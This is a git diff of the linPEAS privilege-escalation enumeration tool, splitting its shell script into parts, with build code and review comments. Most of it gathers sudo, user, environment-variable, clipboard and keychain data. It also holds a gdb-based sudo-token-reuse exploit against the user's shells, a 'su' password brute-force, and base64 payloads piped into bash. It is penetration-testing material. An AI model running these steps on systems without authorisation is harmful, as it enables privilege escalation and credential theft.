[ "$IAMROOT" ] && [ -w /etc/skey/ ]; then + echo "${RED}/etc/skey/ is writable by you" + ls -ld /etc/skey/ + else + ls -ld /etc/skey/ 2>/dev/null + fi +fi +echo "" + +#-- SI) YubiKey athentication +print_2title "YubiKey authentication" +if grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep -q yubikey; then + printf "System supports$RED YubiKey$NC authentication\n" + if ! [ "$IAMROOT" ] && [ -w /var/db/yubikey/ ]; then + echo "${RED}/var/db/yubikey/ is writable by you" + ls -ld /var/db/yubikey/ + else + ls -ld /var/db/yubikey/ 2>/dev/null + fi +fi +echo "" + +#-- SI) Passwords inside pam.d +print_2title "Passwords inside pam.d" +grep -Ri "passwd" /etc/pam.d/ 2>/dev/null | grep -v ":#" | sed "s,passwd,${SED_RED}," +echo "" + + + +peass{SNMP} + +peass{Pypirc} + +peass{Postfix} + +peass{Ldaprc} + +peass{Env} + +peass{Msmtprc} + +peass{Keepass} + +peass{FTP} + +peass{EXTRA_SECTIONS} + +peass{Interesting logs} + +peass{Windows Files} + +peass{Other Interesting Files} diff --git a/linPEAS/builder/linpeas_parts/system_information.sh b/linPEAS/builder/linpeas_parts/system_information.sh new file mode 100644 index 0000000..4967d6a --- /dev/null +++ b/linPEAS/builder/linpeas_parts/system_information.sh 
@@ -0,0 +1,185 @@
+###########################################
+#-------------) System Info (-------------#
+###########################################
+
+#-- SY) OS
+print_2title "Operative system"
+print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits"
+(cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED},"
+warn_exec lsb_release -a 2>/dev/null
+if [ "$MACPEAS" ]; then
+warn_exec system_profiler SPSoftwareDataType
+fi
+echo ""
+
+#-- SY) Sudo
+print_2title "Sudo version"
+if [ "$(command -v sudo 2>/dev/null)" ]; then
+print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version"
+sudo -V 2>/dev/null | grep "Sudo ver" | sed -${E} "s,$sudovB,${SED_RED},"
+else echo_not_found "sudo"
+fi
+echo ""
+
+#--SY) USBCreator
+print_2title "USBCreator"
+print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation"
+if busctl list 2>/dev/null | grep -q com.ubuntu.USBCreator; then
+pc_version=$(dpkg -l 2>/dev/null | grep policykit-desktop-privileges | grep -oP "[0-9][0-9a-zA-Z\.]+")
+if [ -z "$pc_version" ]; then
+ pc_version=$(apt-cache policy policykit-desktop-privileges 2>/dev/null | grep -oP "\*\*\*.*" | cut -d" " -f2)
+fi
+if [ -n "$pc_version" ]; then
+ pc_length=${#pc_version}
+ pc_major=$(echo "$pc_version" | cut -d. -f1)
+ pc_minor=$(echo "$pc_version" | cut -d. -f2)
+ if [ "$pc_length" -eq 4 ] && [ "$pc_major" -eq 0 ] && [ "$pc_minor" -lt 21 ]; then
+ echo "Vulnerable!!" | sed -${E} "s,.*,${SED_RED},"
+ fi
+fi
+fi
+echo ""
+
+#-- SY) PATH
+print_2title "PATH"
+print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-path-abuses"
+echo "$OLDPATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g"
+echo "New path exported: $PATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\. ,${SED_RED_YELLOW},g"
+echo ""
+
+#-- SY) Date
+print_2title "Date & uptime"
+warn_exec date 2>/dev/null
+warn_exec uptime 2>/dev/null
+echo ""
+
+#-- SY) System stats
+print_2title "System stats"
+(df -h || lsblk) 2>/dev/null || echo_not_found "df and lsblk"
+warn_exec free 2>/dev/null
+echo ""
+
+#-- SY) CPU info
+print_2title "CPU info"
+warn_exec lscpu 2>/dev/null
+echo ""
+
+#-- SY) Environment vars
+print_2title "Environment"
+print_info "Any private information inside environment variables?"
+(env || printenv || set) 2>/dev/null | grep -v "RELEVANT*|FIND*|^VERSION=|dbuslistG|mygroups|ldsoconfdG|pwd_inside_history|kernelDCW_Ubuntu_Precise|kernelDCW_Ubuntu_Trusty|kernelDCW_Ubuntu_Xenial|kernelDCW_Rhel|^sudovB=|^rootcommon=|^mounted=|^mountG=|^notmounted=|^mountpermsB=|^mountpermsG=|^kernelB=|^C=|^RED=|^GREEN=|^Y=|^B=|^NC=|TIMEOUT=|groupsB=|groupsVB=|knw_grps=|sidG|sidB=|sidVB=|sidVB2=|sudoB=|sudoG=|sudoVB=|timersG=|capsB=|notExtensions=|Wfolders=|writeB=|writeVB=|_usrs=|compiler=|PWD=|LS_COLORS=|pathshG=|notBackup=|processesDump|processesB|commonrootdirs" | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[aA][pP][iI][kK][eE][yY]|[aA][pP][iI][_][kK][eE][yY]|KRB5CCNAME,${SED_RED},g" || echo_not_found "env || set"
+echo ""
+
+#-- SY) Dmesg
+print_2title "Searching Signature verification failed in dmseg"
+print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#dmesg-signature-verification-failed"
+(dmesg 2>/dev/null | grep "signature") || echo_not_found "dmesg"
+echo ""
+
+#-- SY) Kernel extensions
+if [ "$MACPEAS" ]; then
+ print_2title "Kernel Extensions not belonging to apple"
+ kextstat 2>/dev/null | grep -Ev " com.apple."
+
+ print_2title "Unsigned Kernel Extensions"
+ macosNotSigned /Library/Extensions
+ macosNotSigned /System/Library/Extensions
+fi
+
+if [ "$(command -v bash 2>/dev/null)" ]; then
+ print_2title "Executing Linux Exploit Suggester"
+ print_info "https://github.com/mzet-/linux-exploit-suggester"
+ les_b64="peass{LES}"
+ echo $les_b64 | base64 -d | bash
+ echo ""
+fi
+
+if [ "$(command -v perl 2>/dev/null)" ]; then
+ print_2title "Executing Linux Exploit Suggester 2"
+ print_info "https://github.com/jondonas/linux-exploit-suggester-2"
+ les2_b64="peass{LES2}"
+ echo $les2_b64 | base64 -d | perl
+ echo ""
+fi
+
+if [ "$(command -v brew 2>/dev/null)" ]; then
+ print_2title "Brew Doctor Suggestions"
+ brew doctor
+ echo ""
+fi
+
+
+
+#-- SY) AppArmor
+print_2title "Protections"
+print_list "AppArmor enabled? .............. "$NC
+if [ "$(command -v aa-status 2>/dev/null)" ]; then
+ aa-status 2>&1 | sed "s,disabled,${SED_RED},"
+elif [ "$(command -v apparmor_status 2>/dev/null)" ]; then
+ apparmor_status 2>&1 | sed "s,disabled,${SED_RED},"
+elif [ "$(ls -d /etc/apparmor* 2>/dev/null)" ]; then
+ ls -d /etc/apparmor*
+else
+ echo_not_found "AppArmor"
+fi
+
+#-- SY) grsecurity
+print_list "grsecurity present? ............ "$NC
+( (uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo_not_found "grsecurity")
+
+#-- SY) PaX
+print_list "PaX bins present? .............. "$NC
+(command -v paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo_not_found "PaX")
+
+#-- SY) Execshield
+print_list "Execshield enabled? ............ "$NC
+(grep "exec-shield" /etc/sysctl.conf 2>/dev/null || echo_not_found "Execshield") | sed "s,=0,${SED_RED},"
+
+#-- SY) SElinux
+print_list "SELinux enabled? ............... "$NC
+(sestatus 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED},"
+
+#-- SY) Gatekeeper
+if [ "$MACPEAS" ]; then
+ print_list "Gatekeeper enabled? .......... "$NC
+ (spctl --status 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED},"
+
+ print_list "sleepimage encrypted? ........ "$NC
+ (sysctl vm.swapusage | grep "encrypted" | sed "s,encrypted,${SED_GREEN},") || echo_no
+
+ print_list "XProtect? .................... "$NC
+ (system_profiler SPInstallHistoryDataType 2>/dev/null | grep -A 4 "XProtectPlistConfigData" | tail -n 5 | grep -Iv "^$") || echo_no
+
+ print_list "SIP enabled? ................. "$NC
+ csrutil status | sed "s,enabled,${SED_GREEN}," | sed "s,disabled,${SED_RED}," || echo_no
+
+ print_list "Connected to JAMF? ........... "$NC
+ warn_exec jamf checkJSSConnection
+
+ print_list "Connected to AD? ............. "$NC
+ dsconfigad -show && echo "" || echo_no
+fi
+
+#-- SY) ASLR
+print_list "Is ASLR enabled? ............... "$NC
+ASLR=$(cat /proc/sys/kernel/randomize_va_space 2>/dev/null)
+if [ -z "$ASLR" ]; then
+ echo_not_found "/proc/sys/kernel/randomize_va_space";
+else
+ if [ "$ASLR" -eq "0" ]; then printf $RED"No"$NC; else printf $GREEN"Yes"$NC; fi
+ echo ""
+fi
+
+#-- SY) Printer
+print_list "Printer? ....................... "$NC
+(lpstat -a || system_profiler SPPrintersDataType || echo_no) 2>/dev/null
+
+#-- SY) Running in a virtual environment
+print_list "Is this a virtual machine? ..... "$NC
+hypervisorflag=$(grep flags /proc/cpuinfo 2>/dev/null | grep hypervisor)
+if [ "$(command -v systemd-detect-virt 2>/dev/null)" ]; then
+ detectedvirt=$(systemd-detect-virt)
+ if [ "$hypervisorflag" ]; then printf $RED"Yes ($detectedvirt)"$NC; else printf $GREEN"No"$NC; fi
+else
+ if [ "$hypervisorflag" ]; then printf $RED"Yes"$NC; else printf $GREEN"No"$NC; fi
+fi
diff --git a/linPEAS/builder/linpeas_parts/users_information.sh b/linPEAS/builder/linpeas_parts/users_information.sh
new file mode 100644
index 0000000..d0de135
--- /dev/null
+++ b/linPEAS/builder/linpeas_parts/users_information.sh
@@ -0,0 +1,226 @@ +########################################### +#----------) Users Information (----------# +########################################### +print_title "Users Information" + +#-- UI) My user +print_2title "My user" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#users" +(id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" +echo "" + +if [ "$MACPEAS" ];then + print_2title "Current user Login and Logout hooks" + defaults read $HOME/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook" + echo "" + + print_2title "All Login and Logout hooks" + defaults read /Users/*/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook" + defaults read /private/var/root/Library/Preferences/com.apple.loginwindow.plist + echo "" + + print_2title "Keychains" + print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#chainbreaker" + security list-keychains + echo "" + + print_2title "SystemKey" + ls -l /var/db/SystemKey + if [ -r "/var/db/SystemKey" ]; then + echo "You can read /var/db/SystemKey" | sed -${E} "s,.*,${SED_RED_YELLOW},"; + hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey | sed -${E} "s,.*,${SED_RED_YELLOW},"; + fi + echo "" +fi + +#-- UI) PGP keys? +print_2title "Do I have PGP keys?" +command -v gpg 2>/dev/null || echo_not_found "gpg" +gpg --list-keys 2>/dev/null +command -v netpgpkeys 2>/dev/null || echo_not_found "netpgpkeys" +netpgpkeys --list-keys 2>/dev/null +command -v netpgp 2>/dev/null || echo_not_found "netpgp" +echo "" + +#-- UI) Clipboard and highlighted text +print_2title "Clipboard or highlighted text?" 
+if [ "$(command -v xclip 2>/dev/null)" ]; then + echo "Clipboard: "$(xclip -o -selection clipboard 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," + echo "Highlighted text: "$(xclip -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," +elif [ "$(command -v xsel 2>/dev/null)" ]; then + echo "Clipboard: "$(xsel -ob 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," + echo "Highlighted text: "$(xsel -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," +elif [ "$(command -v pbpaste 2>/dev/null)" ]; then + echo "Clipboard: "$(pbpaste) | sed -${E} "s,$pwd_inside_history,${SED_RED}," +else echo_not_found "xsel and xclip" +fi +echo "" + +#-- UI) Sudo -l +print_2title "Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" +(echo '' | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed "s,\!root,${SED_RED},") 2>/dev/null || echo_not_found "sudo" +if [ "$PASSWORD" ]; then + (echo "$PASSWORD" | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "sudo" +fi +( grep -Iv "^$" cat /etc/sudoers | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "/etc/sudoers" +if ! 
[ "$IAMROOT" ] && [ -w '/etc/sudoers.d/' ]; then + echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed -${E} "s,.*,${SED_RED_YELLOW}," +fi +for filename in '/etc/sudoers.d/*'; do + if [ -r "$filename" ]; then + echo "Sudoers file: $filename is readable" | sed -${E} "s,.*,${SED_RED},g" + grep -Iv "^$" "$filename" | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," + fi +done +echo "" + +#-- UI) Sudo tokens +print_2title "Checking sudo tokens" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#reusing-sudo-tokens" +ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)" +if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0)" | sed "s,is disabled,${SED_RED},g"; +else echo "ptrace protection is enabled ($ptrace_scope)" | sed "s,is enabled,${SED_GREEN},g"; +fi +is_gdb="$(command -v gdb 2>/dev/null)" +if [ "$is_gdb" ]; then echo "gdb was found in PATH" | sed -${E} "s,.*,${SED_RED},g"; +else echo "gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it" | sed "s,gdb,${SED_GREEN},g"; +fi +if [ ! "$SUPERFAST" ] && [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ] && [ "$is_gdb" ]; then + echo "Checking for sudo tokens in other shells owned by current user" + for pid in $(pgrep '^(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$' -u "$(id -u)" 2>/dev/null | grep -v "^$$\$"); do + echo "Injecting process $pid -> "$(cat "/proc/$pid/comm" 2>/dev/null) + echo 'call system("echo | sudo -S touch /tmp/shrndom32r2r >/dev/null 2>&1 && echo | sudo -S chmod 777 /tmp/shrndom32r2r >/dev/null 2>&1")' | gdb -q -n -p "$pid" >/dev/null 2>&1 + if [ -f "/tmp/shrndom32r2r" ]; then + echo "Sudo token reuse exploit worked with pid:$pid! 
(see link)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; + break + fi + done + if [ -f "/tmp/shrndom32r2r" ]; then + rm -f /tmp/shrndom32r2r 2>/dev/null + else echo "The escalation didn't work... (try again later?)" + fi +fi +echo "" + +#-- UI) Doas +print_2title "Checking doas.conf" +doas_dir_name=$(dirname "$(command -v doas)" 2>/dev/null) +if [ "$(cat /etc/doas.conf $doas_dir_name/doas.conf $doas_dir_name/../etc/doas.conf $doas_dir_name/etc/doas.conf 2>/dev/null)" ]; then + cat /etc/doas.conf "$doas_dir_name/doas.conf" "$doas_dir_name/../etc/doas.conf" "$doas_dir_name/etc/doas.conf" 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_RED}," | sed "s,root,${SED_RED}," | sed "s,nopass,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," +else echo_not_found "doas.conf" +fi +echo "" + +#-- UI) Pkexec policy +print_2title "Checking Pkexec policy" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe#pe-method-2" +(cat /etc/polkit-1/localauthority.conf.d/* 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED}," | sed -${E} "s,$groupsVB,${SED_RED}," | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," | sed -${E} "s,$Groups,${SED_RED_YELLOW},") || echo_not_found "/etc/polkit-1/localauthority.conf.d" +echo "" + +#-- UI) Superusers +print_2title "Superusers" +awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED_YELLOW}," | sed "s,root,${SED_RED}," +echo "" + +#-- UI) Users with console +print_2title "Users with console" +if [ "$MACPEAS" ]; then + dscl . list /Users | while read uname; do + ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2) + if grep -q "$ushell" /etc/shells; then #Shell user + dscl . 
-read "/Users/$uname" UserShell RealName RecordName Password NFSHomeDirectory 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + echo "" + fi + done +else + no_shells=$(grep -Ev "sh$" /etc/passwd 2>/dev/null | cut -d ':' -f 7 | sort | uniq) + unexpected_shells="" + printf "%s\n" "$no_shells" | while read f; do + if $f -c 'whoami' 2>/dev/null | grep -q "$USER"; then + unexpected_shells="$f\n$unexpected_shells" + fi + done + grep "sh$" /etc/passwd 2>/dev/null | sort | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + if [ "$unexpected_shells" ]; then + printf "%s" "These unexpected binaries are acting like shells:\n$unexpected_shells" | sed -${E} "s,/.*,${SED_RED},g" + echo "Unexpected users with shells:" + printf "%s\n" "$unexpected_shells" | while read f; do + if [ "$f" ]; then + grep -E "${f}$" /etc/passwd | sed -${E} "s,/.*,${SED_RED},g" + fi + done + fi +fi +echo "" + +#-- UI) All users & groups +print_2title "All users & groups" +if [ "$MACPEAS" ]; then + dscl . 
list /Users | while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" +else + cut -d":" -f1 /etc/passwd 2>/dev/null| while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" +fi +echo "" + +#-- UI) Login now +print_2title "Login now" +(w || who || finger || users) 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," +echo "" + +#-- UI) Last logons +print_2title "Last logons" +(last -Faiw || last) 2>/dev/null | tail | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_RED}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," +echo "" + +#-- UI) Login info +print_2title "Last time logon each user" +lastlog 2>/dev/null | grep -v "Never" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + +EXISTS_FINGER="$(command -v finger 2>/dev/null)" +if [ "$MACPEAS" ] && [ "$EXISTS_FINGER" ]; then + dscl . list /Users | while read uname; do + ushell=$(dscl . 
-read "/Users/$uname" UserShell | cut -d " " -f2) + if grep -q "$ushell" /etc/shells; then #Shell user + finger "$uname" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + echo "" + fi + done +fi +echo "" + +#-- UI) Password policy +print_2title "Password policy" +grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null || echo_not_found "/etc/login.defs" +echo "" + +if [ "$MACPEAS" ]; then + print_2title "Relevant last user info and user configs" + defaults read /Library/Preferences/com.apple.loginwindow.plist 2>/dev/null + echo "" + + print_2title "Guest user status" + sysadminctl -afpGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," + sysadminctl -guestAccount status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," + sysadminctl -smbGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," + echo "" +fi + +#-- UI) Brute su +EXISTS_SUDO="$(command -v sudo 2>/dev/null)" +if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ] && [ "$EXISTS_SUDO" ]; then + print_2title "Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds\n"$NC + POSSIBE_SU_BRUTE=$(check_if_su_brute); + if [ "$POSSIBE_SU_BRUTE" ]; then + SHELLUSERS=$(cat /etc/passwd 2>/dev/null | grep -i "sh$" | cut -d ":" -f 1) + printf "%s\n" "$SHELLUSERS" | while read u; do + echo " Bruteforcing user $u..." 
+    su_brute_user_num "$u" $PASSTRY
+ done
+ else
+ printf $GREEN"It's not possible to brute-force su.\n\n"$NC
+ fi
+else
+ print_2title "Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)\n"$NC
+fi
+print_2title "Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!\n"$NC
\ No newline at end of file
diff --git a/linPEAS/builder/src/linpeasBaseBuilder.py b/linPEAS/builder/src/linpeasBaseBuilder.py
new file mode 100644
index 0000000..b7a7ea2
--- /dev/null
+++ b/linPEAS/builder/src/linpeasBaseBuilder.py
@@ -0,0 +1,37 @@
+from .yamlGlobals import (
+ LINPEAS_PARTS,
+ LINPEAS_BASE_PATH,
+ TEMPORARY_LINPEAS_BASE_PATH,
+ PEAS_CHECKS_MARKUP
+)
+
+class LinpeasBaseBuilder:
+ def __init__(self):
+ with open(LINPEAS_BASE_PATH, 'r') as file:
+ self.linpeas_base = file.read()
+
+ def build(self):
+ print("[+] Building temporary linpeas_base.sh...")
+ checks = []
+ for part in LINPEAS_PARTS:
+ name = part["name"]
+ assert name, f"Name not found in {part}"
+ name_check = part["name_check"]
+ assert name_check, f"Name not found in {name_check}"
+ file_path = part["file_path"]
+ assert file_path, f"Name not found in {file_path}"
+
+ with open(file_path, 'r') as file:
+ linpeas_part = file.read()
+
+ checks.append(name_check)
+ self.linpeas_base += f"\nif echo $CHECKS | grep -q {name_check};\n"
+ self.linpeas_base += f'print_title "{name}"\n'
+ self.linpeas_base += linpeas_part
+ self.linpeas_base += f"\nfi\necho ''\necho ''\n"
+ self.linpeas_base += 'if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi\n'
+
+ self.linpeas_base = self.linpeas_base.replace(PEAS_CHECKS_MARKUP, ",".join(checks))
+
+ with open(TEMPORARY_LINPEAS_BASE_PATH, "w") as f:
+ f.write(self.linpeas_base)
diff --git a/linPEAS/builder/src/linpeasBuilder.py b/linPEAS/builder/src/linpeasBuilder.py
index 7880e48..2139467 100644
--- a/linPEAS/builder/src/linpeasBuilder.py
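Review bot: The fourth line of this part, `print_title "Users Information"`, duplicates the `print_title "{name}"` that LinpeasBaseBuilder.build() writes immediately before concatenating each part, so every section banner is printed twice in the assembled script; keep only the builder's copy (it is driven by LINPEAS_PARTS) and delete the line here, and check the sibling parts listed in LINPEAS_PARTS for the same banner. A short header comment would also help readers of the split-out file, e.g. `# Part of linpeas_base.sh: concatenated by LinpeasBaseBuilder; the helper functions (print_2title, echo_not_found, ...) and the colour/SED_* variables it uses are expected to be defined by the base script.`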
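Review bot: The `if` line emitted in build(), `self.linpeas_base += f"\nif echo $CHECKS | grep -q {name_check};\n"`, has no `then`, so everything up to the matching `fi` becomes part of the condition list and the assembled linpeas_base.sh is not valid sh; it should read `self.linpeas_base += f"\nif echo $CHECKS | grep -q {name_check}; then\n"`. The three `assert`s validate build configuration but are stripped under `python -O`; raising `ValueError(f"Missing name/name_check/file_path in {part}")` keeps the check in every run, and the second and third messages currently print the (empty) value instead of the part, so "Name not found in {name_check}" can never show anything useful. A one-line docstring on build() stating that it appends each part wrapped in a `$CHECKS` guard and substitutes PEAS_CHECKS_MARKUP with the comma-joined check names would document the contract the generated script depends on.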
+++ b/linPEAS/builder/src/linpeasBuilder.py @@ -1,12 +1,13 @@ import re import requests import base64 +import os from .peasLoaded import PEASLoaded from .peassRecord import PEASRecord from .fileRecord import FileRecord from .yamlGlobals import ( - LINPEAS_BASE_PATH, + TEMPORARY_LINPEAS_BASE_PATH, PEAS_FINDS_MARKUP, PEAS_STORAGES_MARKUP, PEAS_STORAGES_MARKUP, @@ -38,7 +39,7 @@ class LinpeasBuilder: self.bash_find_f_vars, self.bash_find_d_vars = set(), set() self.bash_storages = set() self.__get_files_to_search() - with open(LINPEAS_BASE_PATH, 'r') as file: + with open(TEMPORARY_LINPEAS_BASE_PATH, 'r') as file: self.linpeas_sh = file.read() def build(self): @@ -309,9 +310,13 @@ class LinpeasBuilder: def __replace_mark(self, mark: str, find_calls: list, join_char: str): """Substitude the markup with the actual code""" + self.linpeas_sh = self.linpeas_sh.replace(mark, join_char.join(find_calls)) #New line char is't needed def write_linpeas(self, path): """Write on disk the final linpeas""" + with open(path, "w") as f: - f.write(self.linpeas_sh) \ No newline at end of file + f.write(self.linpeas_sh) + + os.remove(TEMPORARY_LINPEAS_BASE_PATH) #Remove the built linpeas_base.sh file \ No newline at end of file diff --git a/linPEAS/builder/src/yamlGlobals.py b/linPEAS/builder/src/yamlGlobals.py index 8634b9c..3064a4f 100644 --- 